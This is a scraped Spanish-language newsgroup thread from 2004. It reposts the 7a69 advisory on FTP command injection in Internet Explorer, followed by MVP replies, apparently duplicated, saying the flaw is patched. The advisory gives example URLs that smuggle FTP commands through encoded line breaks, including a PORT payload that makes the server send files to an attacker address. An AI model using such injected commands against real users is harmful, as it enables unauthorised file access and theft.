[SEG] Inyección de comandos FTP en Internet Explorer

08/12/2004 - 19:42 por Windows | Informe spam
(no me hago responsable de las opiniones vertidas al final del
articulo) :>)


7a69Adv#15 - Inyección de comandos FTP en Internet Explorer
http://www.7a69ezine.org/node/view/168

Autor: Albert Puigsech Galicia
Software: Microsoft Internet Explorer
Versiones: 6.0.2800.1106 e inferiores
Tipo: Inyección de comandos
Exploit: Sí

Introducción

Internet Explorer es un conocido navegador HTTP, que al igual que
otros puede usarse para acceder a otro tipo de protocolos, como por
ejemplo el FTP. El historial de seguridad de este software es
realmente increíble y nosotros nos alegramos del estupendo trabajo
realizado por Microsoft. Nos gustan vuestras funcionalidades de
(in)seguridad!

Descripción

Para acceder a un servidor FTP usando Internet Explorer se escribe
"ftp://ftpuser:ftppass@server/directory" en la barra de direcciones y
el navegador se encargará de conectar al servidor y ejecutar los
siguientes comandos (se han omitido algunos de los comandos ya que no
son realmente importantes).

USER ftpuser
PASS ftppass
CWD /directory/

El problema de seguridad reside en la posibilidad de inyectar comandos
FTP en la propia URL añadiendo al final la cadena %0d%0a seguida de
los comandos a inyectar. Si tu accedes a
"ftp://ftpuser:ftppass@server/directory%0d%0asomecommand%0d%0a" se
ejecutarán los siguientes comandos.

USER ftpuser
PASS ftppass
CWD /directory
somecommand
/

La ultima linea contiene un comando erróneo, pero esto no es un
problema, porque 'somecommand' ya ha sido ejecutado.
Exploit

Necesitas convencer a un usuario a acceder a una URL dada por ti y que
este introduzca un login y password validos. Sí! La explotación de
esta vulnerabilidad requiere aplicar ingeniería social. Es posible
realizar cualquier acción permitida por el servidor FTP siempre que el
usuario tenga permiso; crear o borrar ficheros i directorios, etc.
Posiblemente lo más interesante sea descargar ficheros, y ello es
posible con la siguiente URL:

ftp://server/%0d%0aPORT%0d%20a,b,c,...file%0d%0a

Entonces el servidor se conectará al puerto e,f (ver el RFC del FTP
para traducir el número de puerto) de a.b.c.d y enviará los datos
solicitados.

Parche

Internet Explorer es una absoluta basura. La mejor solución es usar
otro navegador como Opera o Firefox.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Origen de la informacion:

Microsoft Internet Explorer Input Validation Error in Processing FTP
URLs May Let Remote Users Inject Arbitrary FTP Commands
http://www.securitytracker.com/aler...12444.html

Preguntas similare

Leer las respuestas

#1 FAQsimil
09/12/2004 - 13:06 | Informe spam
"Windows" escribió en el mensaje
news:1vmneu4tkq2tk$

Para acceder a un servidor FTP usando Internet Explorer se escribe
"ftp://ftpuser:/directory" en la barra de direcciones y
el navegador se encargará de conectar al servidor y ejecutar los
siguientes comandos



Hace meses que no es posible acceder a un FTP de esa forma.


Visita los foros de
www.infochaos.com
Respuesta Responder a este mensaje
#2 JM Tella Llop [MVP Windows]
09/12/2004 - 15:43 | Informe spam
ftp://ftpuser:/directory%0asomecommand%0a



Esto será sinm el SP2, y sin los parches criticos del SP1. No es posible
acceder así a FTP.

Por cierto, el coger mas cultura no te vendría mal, porque ultimamente
no aciertas ni una.

Jose Manuel Tella Llop
MVP - Windows
(quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna clase,
y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.



"Windows" wrote in message
news:1vmneu4tkq2tk$
(no me hago responsable de las opiniones vertidas al final del
articulo) :>)


7a69Adv#15 - Inyección de comandos FTP en Internet Explorer
http://www.7a69ezine.org/node/view/168

Autor: Albert Puigsech Galicia
Software: Microsoft Internet Explorer
Versiones: 6.0.2800.1106 e inferiores
Tipo: Inyección de comandos
Exploit: Sí

Introducción

Internet Explorer es un conocido navegador HTTP, que al igual que
otros puede usarse para acceder a otro tipo de protocolos, como por
ejemplo el FTP. El historial de seguridad de este software es
realmente increíble y nosotros nos alegramos del estupendo trabajo
realizado por Microsoft. Nos gustan vuestras funcionalidades de
(in)seguridad!

Descripción

Para acceder a un servidor FTP usando Internet Explorer se escribe
"ftp://ftpuser:/directory" en la barra de direcciones y
el navegador se encargará de conectar al servidor y ejecutar los
siguientes comandos (se han omitido algunos de los comandos ya que no
son realmente importantes).

USER ftpuser
PASS ftppass
CWD /directory/

El problema de seguridad reside en la posibilidad de inyectar comandos
FTP en la propia URL añadiendo al final la cadena %0d%0a seguida de
los comandos a inyectar. Si tu accedes a
"ftp://ftpuser:/directory%0d%0asomecommand%0d%0a" se
ejecutarán los siguientes comandos.

USER ftpuser
PASS ftppass
CWD /directory
somecommand
/

La ultima linea contiene un comando erróneo, pero esto no es un
problema, porque 'somecommand' ya ha sido ejecutado.
Exploit

Necesitas convencer a un usuario a acceder a una URL dada por ti y que
este introduzca un login y password validos. Sí! La explotación de
esta vulnerabilidad requiere aplicar ingeniería social. Es posible
realizar cualquier acción permitida por el servidor FTP siempre que el
usuario tenga permiso; crear o borrar ficheros i directorios, etc.
Posiblemente lo más interesante sea descargar ficheros, y ello es
posible con la siguiente URL:

ftp://server/%0d%0aPORT%0d%20a,b,c,...file%0d%0a

Entonces el servidor se conectará al puerto e,f (ver el RFC del FTP
para traducir el número de puerto) de a.b.c.d y enviará los datos
solicitados.

Parche

Internet Explorer es una absoluta basura. La mejor solución es usar
otro navegador como Opera o Firefox.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Origen de la informacion:

Microsoft Internet Explorer Input Validation Error in Processing FTP
URLs May Let Remote Users Inject Arbitrary FTP Commands
http://www.securitytracker.com/aler...12444.html
Respuesta Responder a este mensaje
#3 JM Tella Llop [MVP Windows]
09/12/2004 - 15:43 | Informe spam
ftp://ftpuser:/directory%0asomecommand%0a



Esto será sinm el SP2, y sin los parches criticos del SP1. No es posible
acceder así a FTP.

Por cierto, el coger mas cultura no te vendría mal, porque ultimamente
no aciertas ni una.

Jose Manuel Tella Llop
MVP - Windows
(quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna clase,
y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.



"Windows" wrote in message
news:1vmneu4tkq2tk$
(no me hago responsable de las opiniones vertidas al final del
articulo) :>)


7a69Adv#15 - Inyección de comandos FTP en Internet Explorer
http://www.7a69ezine.org/node/view/168

Autor: Albert Puigsech Galicia
Software: Microsoft Internet Explorer
Versiones: 6.0.2800.1106 e inferiores
Tipo: Inyección de comandos
Exploit: Sí

Introducción

Internet Explorer es un conocido navegador HTTP, que al igual que
otros puede usarse para acceder a otro tipo de protocolos, como por
ejemplo el FTP. El historial de seguridad de este software es
realmente increíble y nosotros nos alegramos del estupendo trabajo
realizado por Microsoft. Nos gustan vuestras funcionalidades de
(in)seguridad!

Descripción

Para acceder a un servidor FTP usando Internet Explorer se escribe
"ftp://ftpuser:/directory" en la barra de direcciones y
el navegador se encargará de conectar al servidor y ejecutar los
siguientes comandos (se han omitido algunos de los comandos ya que no
son realmente importantes).

USER ftpuser
PASS ftppass
CWD /directory/

El problema de seguridad reside en la posibilidad de inyectar comandos
FTP en la propia URL añadiendo al final la cadena %0d%0a seguida de
los comandos a inyectar. Si tu accedes a
"ftp://ftpuser:/directory%0d%0asomecommand%0d%0a" se
ejecutarán los siguientes comandos.

USER ftpuser
PASS ftppass
CWD /directory
somecommand
/

La ultima linea contiene un comando erróneo, pero esto no es un
problema, porque 'somecommand' ya ha sido ejecutado.
Exploit

Necesitas convencer a un usuario a acceder a una URL dada por ti y que
este introduzca un login y password validos. Sí! La explotación de
esta vulnerabilidad requiere aplicar ingeniería social. Es posible
realizar cualquier acción permitida por el servidor FTP siempre que el
usuario tenga permiso; crear o borrar ficheros i directorios, etc.
Posiblemente lo más interesante sea descargar ficheros, y ello es
posible con la siguiente URL:

ftp://server/%0d%0aPORT%0d%20a,b,c,...file%0d%0a

Entonces el servidor se conectará al puerto e,f (ver el RFC del FTP
para traducir el número de puerto) de a.b.c.d y enviará los datos
solicitados.

Parche

Internet Explorer es una absoluta basura. La mejor solución es usar
otro navegador como Opera o Firefox.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Origen de la informacion:

Microsoft Internet Explorer Input Validation Error in Processing FTP
URLs May Let Remote Users Inject Arbitrary FTP Commands
http://www.securitytracker.com/aler...12444.html
Respuesta Responder a este mensaje
#4 JM Tella Llop [MVP Windows]
09/12/2004 - 15:43 | Informe spam
ftp://ftpuser:/directory%0asomecommand%0a



Esto será sinm el SP2, y sin los parches criticos del SP1. No es posible
acceder así a FTP.

Por cierto, el coger mas cultura no te vendría mal, porque ultimamente
no aciertas ni una.

Jose Manuel Tella Llop
MVP - Windows
(quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna clase,
y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.



"Windows" wrote in message
news:1vmneu4tkq2tk$
(no me hago responsable de las opiniones vertidas al final del
articulo) :>)


7a69Adv#15 - Inyección de comandos FTP en Internet Explorer
http://www.7a69ezine.org/node/view/168

Autor: Albert Puigsech Galicia
Software: Microsoft Internet Explorer
Versiones: 6.0.2800.1106 e inferiores
Tipo: Inyección de comandos
Exploit: Sí

Introducción

Internet Explorer es un conocido navegador HTTP, que al igual que
otros puede usarse para acceder a otro tipo de protocolos, como por
ejemplo el FTP. El historial de seguridad de este software es
realmente increíble y nosotros nos alegramos del estupendo trabajo
realizado por Microsoft. Nos gustan vuestras funcionalidades de
(in)seguridad!

Descripción

Para acceder a un servidor FTP usando Internet Explorer se escribe
"ftp://ftpuser:/directory" en la barra de direcciones y
el navegador se encargará de conectar al servidor y ejecutar los
siguientes comandos (se han omitido algunos de los comandos ya que no
son realmente importantes).

USER ftpuser
PASS ftppass
CWD /directory/

El problema de seguridad reside en la posibilidad de inyectar comandos
FTP en la propia URL añadiendo al final la cadena %0d%0a seguida de
los comandos a inyectar. Si tu accedes a
"ftp://ftpuser:/directory%0d%0asomecommand%0d%0a" se
ejecutarán los siguientes comandos.

USER ftpuser
PASS ftppass
CWD /directory
somecommand
/

La ultima linea contiene un comando erróneo, pero esto no es un
problema, porque 'somecommand' ya ha sido ejecutado.
Exploit

Necesitas convencer a un usuario a acceder a una URL dada por ti y que
este introduzca un login y password validos. Sí! La explotación de
esta vulnerabilidad requiere aplicar ingeniería social. Es posible
realizar cualquier acción permitida por el servidor FTP siempre que el
usuario tenga permiso; crear o borrar ficheros i directorios, etc.
Posiblemente lo más interesante sea descargar ficheros, y ello es
posible con la siguiente URL:

ftp://server/%0d%0aPORT%0d%20a,b,c,...file%0d%0a

Entonces el servidor se conectará al puerto e,f (ver el RFC del FTP
para traducir el número de puerto) de a.b.c.d y enviará los datos
solicitados.

Parche

Internet Explorer es una absoluta basura. La mejor solución es usar
otro navegador como Opera o Firefox.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Origen de la informacion:

Microsoft Internet Explorer Input Validation Error in Processing FTP
URLs May Let Remote Users Inject Arbitrary FTP Commands
http://www.securitytracker.com/aler...12444.html
email Siga el debate Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaRespuesta Tengo una respuesta
Search Busqueda sugerida